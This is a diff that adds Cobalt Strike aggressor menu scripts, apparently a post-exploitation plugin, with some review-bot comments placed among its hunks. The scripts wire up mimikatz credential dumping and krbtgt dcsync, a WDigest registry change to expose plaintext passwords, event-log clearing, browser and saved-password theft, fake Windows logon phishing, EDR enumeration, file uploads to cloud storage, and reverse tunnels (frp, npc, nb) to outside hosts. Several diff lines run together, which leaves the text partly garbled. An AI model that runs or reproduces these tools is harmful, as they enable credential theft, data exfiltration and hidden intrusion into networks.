+ dialog_description($dialog, "vbs script remote download file, command line parameter, automatic clear vbs download script after execution.");
+ drow_text($dialog, "url", "remote file address: ");
+ drow_text($dialog, "path", "local storage file: ");
+ dbutton_action($dialog, "Run");
+ dialog_show($dialog);
+ }
+ sub vbs {
+ $url = $3['url'];
+ $path = $3['path'];
+ bupload($bid, script_resource("/scripts/Auxiliary/download.vbs"));
+ bshell($bid, "download.vbs $url $path");
+ bshell($bid, "del /f /s /q download.vbs");
+ }
+
+ item "SharpZip (compressed folder)" {
+ $bid = $1['@'];
+ $dialog = dialog("SharpZip compressed package file", %(file => "C:\\Users\\Public", path => "C:\\Users\\Public.zip", bid => $bid), &SharpZip);
+ drow_text($dialog, "file", "file: ");
+ drow_text($dialog, "path", "path: ");
+ dialog_description($dialog, "Compress and package directories or files. Project address: https://github.com/uknowsec/SharpZip");
+ dbutton_action($dialog, "Run");
+ dialog_show($dialog);
+ }
+ sub SharpZip {
+ $arg = join('', @("$3['file'] $3['path']"));
+ bexecute_assembly($bid, script_resource("/scripts/Auxiliary/SharpZip.exe"), $arg);
+ }
+
+ item "SharpOSS(Upload file)" {
+ $bid = $1['@'];
+ $dialog = dialog("SharpOSS", %(bucketName => "", accessKeyId => "", accessKeySecret => "", endpoint => "oss-cn-chengdu.aliyuncs.com", UploadFilePath => "C:\\Users\\Public\\bak.zip", bid => $bid), &SharpOSS);
+ dialog_description($dialog, "Use aliyun-oss-csharp-sdk to quickly upload target system files to Alibaba Cloud OSS. Project address: https://github.com/uknowsec/SharpOSS");
+ drow_text($dialog, "bucketName", "BucketName: ");
+ drow_text($dialog, "accessKeyId", "AccessKeyId: ");
+ drow_text($dialog, "accessKeySecret", "AccessKeySecret: ");
+ drow_text($dialog, "endpoint", "Endpoint: ");
+ drow_text($dialog, "UploadFilePath", "UploadFilePath: ");
+ dbutton_action($dialog, "Run");
+ dialog_show($dialog);
+ }
+ sub SharpOSS {
+ $bucketName = $3['bucketName'];
+ $accessKeyId = $3['accessKeyId'];
+ $accessKeySecret = $3['accessKeySecret']; $endpoint = $3['endpoint']; $UploadFilePath = $3['UploadFilePath']; $arg = join(' ', @($3['bucketName'],$3['accessKeyId'],$3['accessKeySecret'],$3['endpoint'],$3['UploadFilePath'])); bexecute_assembly($bid, script_resource("/scripts/Auxiliary/SharpOSS.exe"), $arg);
+ }
+}
\ No newline at end of file
diff --git a/English/modules/Grab password.cna b/English/modules/Grab password.cna
new file mode 100644
index 0000000..5e26313
--- /dev/null
+++ b/English/modules/Grab password.cna
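Review bot: Each dialog callback in this file (`certutil`, `vbs`, `SharpZip`, `SharpOSS`) acts on the global `$bid` instead of the `bid` value its dialog was opened with, even though every `dialog(...)` call passes `bid => $bid` in its defaults. The menu items assign `$bid` without `local`, so opening a second dialog before pressing Run on the first can send the action to a different session than the one selected, which matters for a tool that must stay on in-scope hosts; assuming the callback's `$3` carries that default as the `bid => $bid` entries suggest, start each callback with `local('$bid'); $bid = $3['bid'];`. In `sub SharpOSS` the five assignments from `$bucketName` to `$UploadFilePath` are never read because `$arg` is built from `$3` directly, and in `sub SharpZip` the `join('', @(...))` over a single string does nothing; both can be dropped. The callbacks in the `Add user.cna` hunk use the same global `$bid` pattern.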
@@ -0,0 +1,190 @@ +menu "Read password" { + item "logonpasswords" { + $bid = $1['@']; + bmimikatz($bid, "sekurlsa::logonpasswords"); + } + item "Krbtgt hash" { + $bid = $1['@']; + $dialog = dialog("Krbtgt NTLM-Hash" , %(domain => "xxx.com" , user => "krbtgt", bid => $bid), &krbtgt); + dialog_description($dialog, "Use Mimikatz to read the NTLM-Hash of the Krbtgt account."); + drow_text($dialog, "domain", "Domain: "); + drow_text($dialog, "user", "User: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub krbtgt{ + $domain = $3['domain']; + $user = $3['user']; + bmimikatz($bid, "lsadump::dcsync /domain:$domain /user:$user"); + } + + menu "Detect wifi password" { + item "Get connected wifi" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "netsh wlan show profiles"); + } + } + item "Get wifi password" { + prompt_text("Enter wifi name: ", "", lambda({ + bshell(@ids, "netsh wlan show profile name=\"$1\" key=clear"); + }, @ids => $1)); + } + item "SharpWifiGrabber (retrieve Wi-Fi password)" + { + blog($1, "Project address: https://github.com/r3nhat/SharpWifiGrabber") + bexecute_assembly($1, script_resource('/scripts/Grab password/SharpWifiGrabber.exe'), ""); + } + } + + menu "Modify registry dump plain text password" { + item "Show plain text" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f"); + } + } + item "Force lock screen" { + local('$bid'); + foreach $bid ($1){ + blog($1, "Lock screen is being executed"); + bpowershell_import($bid, script_resource("/scripts/Grab password/lock-screen.ps1")); + bpowerpick($bid,"Lock-WorkStation"); + bshell($bid,"wevtutil cl \"Windows PowerShell\""); + } + } + item "Hide plain text" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f"); + } + } +} + +menu "Extract 
browser data and passwords" { + item "BrowserGhost (extract browser passwords)" { + blog($1, "Project address: https://github.com/QAX-A-Team/BrowserGhost") + bexecute_assembly($1, script_resource("/scripts/Grab password/BrowserGhost.exe")); + } + + item "SharpChromium (extract browser data)" { + $bid = $1['@']; + $dialog = dialog("SharpChromium", %(bid => $bid), &SharpChromium); + dialog_description($dialog,".NET 4.0 CLR project for retrieving Chromium data such as cookies, history, and saved logins. Project address: https://github.com/djhohnstein/SharpChromium"); drow_combobox($dialog, "Type", "all/cookies/history/logins", @("all", "cookies","history","logins")); dbutton_action($dialog, "Run"); dialog_show($dialog); } sub SharpChromium { bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpChromium.exe"), $3['Type']); } } menu "hack-browser-data" { item "Upload hack-browser-data" { $bid = $1; $dialog = dialog("Upload hack-browser-data", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &hack-browser-data); dialog_description($dialog, "All platforms supported, software address: https://github.com/moonD4rk/HackBrowserData"); + drow_text($dialog, "UploadPath", "Upload path: "); + dbutton_action($dialog, "Upload"); + dialog_show($dialog); + } + sub hack-browser-data { + bcd($bid, $3['UploadPath']); + bupload($bid, script_resource("/scripts/Grab password/hack-browser-data.exe")); + } + + item "Run hack-browser-data"{ + $bid = $1['@']; + $Dialog = dialog("Run hack-browser-data",%(bid => $bid),&hack-browser-data_run); + dialog_description($Dialog, "After running, a results folder will be generated in the current directory, and all results are in it"); + dbutton_action($Dialog, "Run"); + btask($bid, "After running, a results folder will be generated in the current directory, and all the results are in it", ""); + dialog_show($Dialog); + } + sub hack-browser-data_run{ + bshell($bid, "hack-browser-data.exe"); + } + + item "Delete hack-browser-data"{ + 
local('$bid'); + foreach $bid ($1){ + bshell($1, "del /f /s /q hack-browser-data.exe"); + } + } +} + +menu "Local program file password decryption" { + item "SharpCloud (Get cloud credentials)" { + $bid = $1['@']; + $dialog = dialog("Get cloud credentials", %(bid => $bid), &SharpCloud); + dialog_description($dialog, "Used to check whether there are credential files related to AWS, Microsoft Azure and Google Compute. Project address: https://github.com/chrismaddalena/SharpCloud"); drow_combobox($dialog, "type", "type:", @("all","aws","azure","gcloud")); dbutton_action($dialog, "Run"); dialog_show($dialog); } sub SharpCloud { $arg = join(' ', @($3['type'])); bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpCloud.exe"), $arg); } menu "SharpDecryptPwd(from uknowsec)" { item "SharpDecryptPwd" { $bid = $1['@']; $dialog = dialog("SharpDecryptPwd", %(type => "-NavicatCrypto",bid => $bid), &SharpDecryptPwd); dialog_description($dialog,"Parse some programs whose passwords have been saved on the Windwos system, including: Navicat, TeamViewer, FileZilla, WinSCP, Xmangager series products (Xshell, Xftp). 
Project address: https://github.com/uknowsec/SharpDecryptPwd"); + drow_combobox($dialog, "type", "Type:", @("-NavicatCrypto", "-TeamViewer", "-FileZilla","-WinSCP")); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + item "Xmanager" { + $bid = $1['@']; + $dialog = dialog("Xmangager", %(type => "-Xmangager",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &Xmangager); + dialog_description($dialog, "Xmanager series products, such as:Xshell,Xftp。"); + drow_combobox($dialog, "type", "Type:", @("-Xmangager")); + drow_text($dialog, "path", "Sessions Path: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } +} + sub SharpDecryptPwd { + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd.exe"), $3['type']); + } + sub Xmangager { + $arg = join(' ', @($3['type'],"-p",$3['path'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd.exe"), $arg); + } + + menu "SharpDecryptPwd(from RcoIl)" { + item "SharpDecryptPwd40" { + $bid = $1['@']; + $dialog = dialog("SharpDecryptPwd40", %(type => "-Navicat",bid => $bid), &SharpDecryptPwd40); + dialog_description($dialog,"Currently supports Navicat series, Xmanager series, TeamViewer, FileZilla client, Foxmail, RealVNC server, TortoiseSVN, WinSCP, Chrome full version. 
Project address: https://github.com/RcoIl/SharpDecryptPwd"); + drow_combobox($dialog, "type", "Type:", @("-Navicat", "-TeamViewer", "-FileZilla","-WinSCP","-Foxmail","-RealVNC","-TortoiseSVN","-Chrome")); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + item "Xmangager40" { + $bid = $1['@']; + $dialog = dialog("Xmangager", %(type => "-Xmanager",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &Xmangager40); + dialog_description($dialog, "Xmangager series products, such as:Xshell,Xftp"); + drow_combobox($dialog, "type", "Type:", @("-Xmanager")); + drow_text($dialog, "path", "Sessions Path: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + } + sub SharpDecryptPwd40 { + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd40.exe"), $3['type']); + } + sub Xmangager40 { + $arg = join(' ', @($3['type'],"-p",$3['path'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd40.exe"), $arg); + } +} + + item "Net-GPPPassword (Group Policy Account Credentials)" { + blog($1, ".NET implementation of Get-GPPPassword. Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferences. This technique is old, but still useful in environments where domains were created a long time ago. Project address: https://github.com/outflanknl/Net-GPPPassword") + bexecute_assembly($1, script_resource("/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe"), ""); + } + + menu "Phishing password stealing" { + item "FakeLogonScreen (windows lock screen phishing)" { + $bid = $1; + $dialog = dialog("FakeLogonScreen", %(bid => $bid), &FakeLogonScreen); + dialog_description($dialog, "FakeLogonScreen is a utility for faking the Windows login screen to obtain the user's password. 
The entered password is verified against Active Directory or the local computer to ensure that the password is correct, and the output is written to the console and the %LOCALAPPDATA%\\Microsoft\\user.db file. Because the fake page is hard to describe, use it with caution!!! Project address: https://github.com/bitsadmin/fakelogonscreen"); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub FakeLogonScreen { + bexecute_assembly($bid, script_resource("/scripts/Grab password/FakeLogonScreenToFile.exe"), ""); + } + + item "CredPhisher (Authentication Login Box Phishing)" { + $bid = $1['@']; + $dialog = dialog("CredPhisher", %(content => "Security Authentication", bid => $bid), &CredPhisher); + dialog_description($dialog, "Pop up the security authentication login box for phishing. Windows 10 test successful. Project address: https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher"); + drow_text($dialog, "content", "content:"); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub CredPhisher { + $arg = join('',@("",$3['content'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/CredPhisher.exe"), $arg); + } + } + + +} \ No newline at end of file diff --git a/English/modules/Information collection.cna b/English/modules/Information collection.cna new file mode 100644 index 0000000..71822b2 --- /dev/null +++ b/English/modules/Information collection.cna 
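Review bot: The "Force lock screen" item finishes with `bshell($bid,"wevtutil cl \"Windows PowerShell\"");`, which empties the host's entire Windows PowerShell event log, and neither the menu label nor the `blog` text says so. That discards audit records unrelated to this action and cannot be undone, so I would delete the line; if it stays, it needs a comment such as `# clears the whole "Windows PowerShell" log on the host - irreversible, must be listed in the engagement report`. In the same menu, "Hide plain text" writes `UseLogonCredential` to 0 unconditionally instead of restoring whatever was there before "Show plain text", and a comment should say the prior state is not preserved. Both the WDigest registry write and the log clear are host changes that defenders will want to reconcile against their own registry-audit and log-cleared telemetry.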
@@ -0,0 +1,329 @@
+menu "Information collection" {
+menu "Common stand-alone commands" {
+item "systeminfo" {
+$bid = $1['@'];
+bshell($bid, "systeminfo");
+}
+item "whoami /all" {
+$bid = $1['@'];
+bshell($bid, "whoami /all");
+}
+item "ipconfig /all" {
+$bid = $1['@'];
+bshell($bid, "ipconfig /all");
+}
+item "View routing table" {
+$bid = $1['@'];
+bshell($bid, "route print");
+}
+item "View arp cache" {
+$bid = $1['@'];
+bshell($bid, "arp -A");
+}
+item "View user information" {
+$bid = $1['@'];
+bshell($bid, "net user");
+}
+item "View installation program and version information" {
+$bid = $1['@'];
+bshell($bid, "wmic product get name,version");
+}
+item "View installed patches" {
+$bid = $1['@'];
+bshell($bid, "wmic qfe get Caption,Description,HotFixID,InstalledOn");
+}
+item "View running processes and paths" {
+$bid = $1['@'];
+bshell($bid, "wmic process get caption,executablepath,commandline");
+}
+item "View process details" {
+$bid = $1['@'];
+bshell($bid, "wmic process get caption,commandline,processid /value");
+}
+item "View services" {
+$bid = $1['@'];
+bshell($bid, "wmic service list brief");
+}
+item "View firewall configuration" {
+$bid = $1['@'];
+bshell($bid, "netsh firewall show config");
+}
+item "View scheduled tasks" {
+$bid = $1['@'];
+bshell($bid, "schtasks.exe");
+}
+item "View scheduled task details" {
+$bid = $1['@'];
+bshell($bid, "schtasks /query /fo LIST /v");
+}
+item "View startup program information" {
+$bid = $1['@'];
+bshell($bid, "wmic startup get command,caption");
+}
+item "View online users" {
+$bid = $1['@'];
+bshell($bid, "query user || qwinsta");
+}
+item "View boot time" {
+$bid = $1['@'];
+bshell($bid, "net statistics workstation");
+}
+item "View PowerShell v5 historical commands" {
+$bid = $1['@'];
+bshell($bid, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt");
+}
+item "View recently used items" {
+$bid = $1['@'];
+bshell($bid, "dir %APPDATA%\\Microsoft\\Windows\\Recent");
+}
+item "View SMB pointing path" { +$bid = $1['@']; +bshell($bid, "wmic share get name,path"); +} +} + +menu "Common commands in domain environment" { +menu "AdFind (query domain information)" { +item "Upload AdFind" { +$bid = $1; +$dialog = dialog("Upload AdFind", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &AdFind_upload); +dialog_description($dialog,"AdFind is used to query information within the domain. Project address: http://www.joeware.net/freetools/tools/adfind/index.htm"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub AdFind_upload { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Information collection/AdFind.exe")); +} +item "List domain controller names" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc dclist"); +} +item "Query online computers in the current domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc computers_active"); +} +item "Query online computers in the current domain (only display name and operating system)" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc computers_active name operatingSystem"); +} +item "Query all computers in the current domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -f \"objectcategory=computer\""); +} +item "Query all computers in the current domain (only display name and operating system)" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -f \"objectcategory=computer\" name operatingSystem"); +} +item "Query all users in the domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -users name"); +} +item "Query all GPOs" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc gpodmp"); +} +item "Delete AdFind" { +$bid = $1['@']; +bshell($bid, "del /f /s /q AdFind.exe"); +} +} + +item "Query domain" { +$bid = $1['@']; +bshell($bid, "net view /domain"); +} +item "View domain management" { +$bid = $1['@']; +bshell($bid, "net group \"domain admins\" /domain"); +} +item "View domain user details" { +prompt_text("Enter 
domain user name", "", lambda({bshell(@bid, "net user $1 /domain");}, @bid => $bid)); +} +item "View current login domain" { +$bid = $1['@']; +bshell($bid, "net config workstation"); +} +item "View time server" { +$bid = $1['@']; +bshell($bid, "net time /domain"); +} +item "Display the computer list of the current domain" { +$bid = $1['@']; +bshell($bid, "net view"); +} +item "View the domain administrator logged in to this machine" { +$bid = $1['@']; +bshell($bid, "net localgroup administrators /domain"); +} +item "View all domain users" { +$bid = $1['@']; +bshell($bid, "net user /domain"); +} +item "View the list of all user groups in the domain" { +$bid = $1['@']; +bshell($bid, "net group /domain"); +} +item "View the primary domain controller" { +$bid = $1['@']; +bshell($bid, "netdom query pdc"); +} +item "View the domain controller list" { +$bid = $1['@']; +bshell($bid, "net group \"Domain Controllers\" /domain"); +} +item "View domain controller host name" { +$bid = $1['@']; +bshell($bid, "Nslookup -type=SRV _ldap._tcp"); +} +item "Get domain trust information" { +$bid = $1['@']; +bshell($bid, "nltest /domain_trusts"); +} +item "Get domain password information" { +$bid = $1['@']; +bshell($bid, "net accounts /domain"); +} +item "View a list of all domain member computers" { +$bid = $1['@']; +bshell($bid, "net group \"domain computers\" /domain"); +} +item "View all computers in the domain" { +prompt_text("Enter host name", "", lambda({bshell(@bid, "net view /domain:$1");}, @bid => $bid)); } } + + item "SharpChassisType (determine the host type)" { +$bid = $1['@']; +$dialog = dialog("SharpNetCheck", %(bid => $bid), &SharpChassisType); +dialog_description($dialog,"Used to determine the current machine type (desktop computer, laptop, etc.). 
Project address: https://github.com/RcoIl/CSharp-Tools/"); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpChassisType{ +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpChassisType.exe"), ""); +} + +item "SharpEventLog (get system login log)" { +$bid = $1; +$dialog = dialog("SharpEventLog", %(EventLogType => "-4624",bid => $bid), &SharpEventLog); +dialog_description($dialog, "Read all computer information of failed or successful logins (4624, 4625) that have logged into the local machine, and quickly locate the operation and maintenance management personnel during intranet penetration. Project address: https://github.com/uknowsec/SharpEventLog"); +drow_combobox($dialog, "EventLogType", "EventLog Type:", @("-4624", "-4625")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpEventLog { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpEventLog.exe"), $3['EventLogType']); +} + +item "SharpCheckInfo(Get multiple host information)" { +$bid = $1; +$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpCheckInfo); +dialog_description($dialog, "Collect target host information, including recently opened files, system environment variables, and Recycle Bin files, etc. 
Project address: https://github.com/uknowsec/SharpCheckInfo"); +drow_combobox($dialog, "Type", "Type:", @("-All", "-EnvironmentalVariables","-GetRecycle","-AllUserDirectories","-PowershellInfo","-CsharpVersion","-AvProcessEDRproduct","-Defender","-RecentFiles","-NetworkConnentions","-ApplockerEnumerating","-Drives","-LAPS")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpCheckInfo { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpCheckInfo.exe"), $3['Type']); +} + + item "SharpSQLDump (Quickly List Database Data)" { +$bid = $1['@']; +$dialog = dialog("SharpSQLDump", %(host => "",username => "",password => "",type => "mysql",bid => $bid), &SharpSQLDump); +dialog_description($dialog, "Quickly obtain all database names, table names, and column names in the intranet penetration. After specific judgment, go to the data to save time. Applicable to mysql, mssql. Project address: https://github.com/uknowsec/SharpSQLDump"); +drow_text($dialog, "host", "host: "); +drow_text($dialog, "username", "username: "); +drow_text($dialog, "password", "password: "); +drow_combobox($dialog, "type", "-mysql/-mssql", @("-mysql", "-mssql")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpSQLDump { +$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type'])); +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpSQLDump.exe"), $arg); +} + +item "SharpClipHistory(Get win10 clipboard)" { +$bid = $1; +$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpClipHistory); +dialog_description($dialog, "Can be used to read the contents of the user's clipboard history in Windows 10 starting from the 1809 Build version. A blank type option means reading. 
Project address: https://github.com/FSecureLABS/SharpClipHistory"); +drow_combobox($dialog, "Type", "Type:", @("--help","","--checkOnly","--enableHistory","--saveImages","--keepassBypass")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpClipHistory { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpClipHistory.exe"), $3['Type']); +} + +item "SharpAVKB(Antivirus and Patch Comparison)" { +$bid = $1; +$dialog = dialog("SharpAVKB", %(type => "-AV",bid => $bid), &SharpAVKB); +dialog_description($dialog, "Windows antivirus comparison and patch number comparison. Project address: https://github.com/uknowsec/SharpAVKB"); +drow_combobox($dialog, "type", "type:", @("-AV", "-KB")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpAVKB { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpAVKB.exe"), $3['type']); +} + +item "SharpEDRChecker (Get EDR Information)" { +$bid = $1['@']; +btask($bid, "Check running processes, process metadata, Dlls loaded into the current process and each DLL metadata, common installation directories, installed services and each service binary metadata, installed drivers and each driver metadata, all of which exist for known defensive products such as AV, EDR, and logging tools. It is also possible to capture hidden EDRs through its metadata check. Project address: https://github.com/PwnDexter/SharpEDRChecker", ""); +bexecute_assembly($1, script_resource("/scripts/Information collection/SharpEDRChecker.exe"), ""); +} + + item "SharpDir (file search)" { +$bid = $1['@']; +$dialog = dialog("File search", %(path => "C:\\",file => "payload.exe||passwords*||*.txt",bid => $bid), &SharpDir); +dialog_description($dialog, "File search, three search methods, specify file name, set file name search suffix, search for specified suffix file. 
Project address: https://github.com/jnqpblc/SharpDir"); +drow_text($dialog, "path", "path: "); +drow_text($dialog, "file", "file: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpDir { +$arg = join(' ', @($3['path'],$3['file'])); +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpDir.exe"), $arg); +} + +menu "Everything (Create http service file search)" { +item "Upload Everything" { +$bid = $1; +$dialog = dialog("Upload Everything", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &evething); +dialog_description($dialog, "Run without any pop-up window, software address: https://www.voidtools.com/zh-cn/"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub evething { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Information collection/everything/Everything.exe")); +bupload($bid, script_resource("/scripts/Information collection/everything/Everything.ini")); +} + +item "Run Everything"{ +$bid = $1['@']; +$Dialog = dialog("Run Evething",%(bid => $bid),&Evething_run); +dialog_description($Dialog, "Run without any pop-up window or tray display, automatically enable http service. Port: 65535, User: admin, Password: admin@123"); +btask($bid, "Run without any pop-up window or tray display, automatically enable http service. Access web service: http://ip:65535, User: admin, Password: admin@123", ""); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub Evething_run{ +bshell($bid, "Everything.exe"); +} +item "Stop Everything"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im Everything.exe"); +} +} +item "Delete Everything"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im Everything.exe & del /f /s /q Everything.exe & del /f /s /q Everything.ini"); } } } + + + +} 
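Review bot: "Run Everything" starts an HTTP file-index service on the host with fixed credentials published in this repository (the dialog text gives port 65535, user admin, password admin@123, presumably set in the uploaded `Everything.ini`), so while it runs anyone who can reach that port can browse the machine's files with the known defaults. The description should state that exposure explicitly rather than only saying it runs "without any pop-up window", and the values should not be shared constants; the hard-coded `token is: uknowsec` in the frpc dialog of the Intranet agent hunk has the same problem. Separately, "Stop Everything" and "Delete Everything" use `taskkill -f /im Everything.exe` and `del /f /s /q Everything.exe`, which match by image name and recurse below the current directory, so they also terminate and delete a legitimate Everything install the user already had. Deleting only the uploaded path and dropping `/s` avoids that collateral damage.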
diff --git a/English/modules/Intranet agent.cna b/English/modules/Intranet agent.cna
new file mode 100644
index 0000000..2c2f131
--- /dev/null
+++ b/English/modules/Intranet agent.cna
@@ -0,0 +1,185 @@
+menu "Intranet penetration" {
+menu "frpModify" {
+item "Upload frpc" {
+$bid = $1;
+$dialog = dialog("Upload frpc", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &frp_upload);
+dialog_description($dialog,"frp specified parameter version (no need to implement frpc.ini). Project address: https://github.com/uknowsec/frpModify");
+drow_text($dialog, "UploadPath", "Upload path: ");
+dbutton_action($dialog, "Upload");
+dialog_show($dialog);
+}
+sub frp_upload {
+bcd($bid, $3['UploadPath']);
+bupload($bid, script_resource("/scripts/Intranet agent/frpcx.exe"));
+}
+item "Run frpc"{
+$bid = $1['@'];
+$Dialog = dialog("Run frpc",%(ip => "x.x.x.x", port => "2333",bid => $bid),&frpc_run);
+dialog_description($Dialog, "Run frpc, use frpModify, specify parameters, token is: uknowsec, socks5 port is 23333.");
+drow_text($Dialog, "ip", "ip: ");
+drow_text($Dialog, "port", "port: ");
+dbutton_action($Dialog, "Run");
+dialog_show($Dialog);
+}
+sub frpc_run{
+local('$Name $port');
+$Name = $3['ip'];
+$port = replace($3['port'], "\"", "");
+bshell($bid, "frpcx.exe -t $+ $Name -p $+ $port");
+}
+item "Stop frpc"{
+local('$bid');
+foreach $bid ($1){
+bshell($1, "taskkill -f /im frpcx.exe");
+}
+}
+item "Delete frpc"{
+local('$bid');
+foreach $bid ($1){
+bshell($1, "taskkill -f /im frpcx.exe & del /f /s /q frpcx.exe");
+}
+}
+}
+menu "nps" {
+item "Upload npc" {
+$bid = $1;
+$dialog = dialog("Upload npc", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &npc_upload);
+dialog_description($dialog,"A lightweight, high-performance, powerful intranet penetration proxy server. Supports almost all traffic forwarding such as tcp, udp, socks5, http, etc. Reference: https://mp.weixin.qq.com/s/zI04_kxVFWdnegctAzNmmg. 
Project address: https://github.com/ehang-io/nps"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub npc_upload { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/npc.exe")); +} +item "Run npc"{ +$bid = $1['@']; +$Dialog = dialog("Run npc",%(server => "ip:8024", vkey => "",bid => $bid),&npc_run); +dialog_description($Dialog, "Run NPC, no configuration file, use reference: https://mp.weixin.qq.com/s/zI04_kxVFWdnegctAzNmmg."); +drow_text($Dialog, "server", "server: "); +drow_text($Dialog, "vkey", "vkey: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub npc_run{ +local('$server $vkey'); +$server = $3['server']; +$vkey = replace($3['vkey'], "\"", ""); +bshell($bid, "npc.exe -server= $+ $server -vkey= $+ $vkey"); +} +item "Stop NPC"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im npc.exe"); +} +} +item "Delete npc"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im npc.exe & del /f /s /q npc.exe"); +} +} +} + +menu "NATBypass (port forwarding)" { +item "Upload nb" { +$bid = $1; +$dialog = dialog("Upload nb", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &nb); +dialog_description($dialog,"An implementation of lcx in golang. 
Project address: https://github.com/cw1997/NATBypass"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub nb { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/nb.exe")); +} + item "Run nb"{ +$bid = $1['@']; +$Dialog = dialog("Run nb",%(lhost => "127.0.0.1:3389", rhost => "x.x.x.x:1997",bid => $bid),&nb_run); +dialog_description($Dialog, "vps run: ./nb -listen 1997 2017"); +drow_text($Dialog, "lhost", "Local IP:Port"); +drow_text($Dialog, "rhost", "Public IP:Port"); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub nb_run{ +local('$lhost $rhost'); +$lhost = $3['lhost']; +$rhost = replace($3['rhost'], "\"", ""); +bshell($bid, "nb.exe -slave $+ $lhost $+ $rhost"); +} +item "Stop nb"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im nb.exe"); +} +} +item "Delete nb"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im nb.exe & del /f /s /q nb.exe"); +} +} +} + +menu "iox (port forwarding and socks5)" { +item "Upload iox" { +$bid = $1; +$dialog = dialog("Upload iox", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &iox); +dialog_description($dialog,"Port forwarding tool and socks5 proxy. 
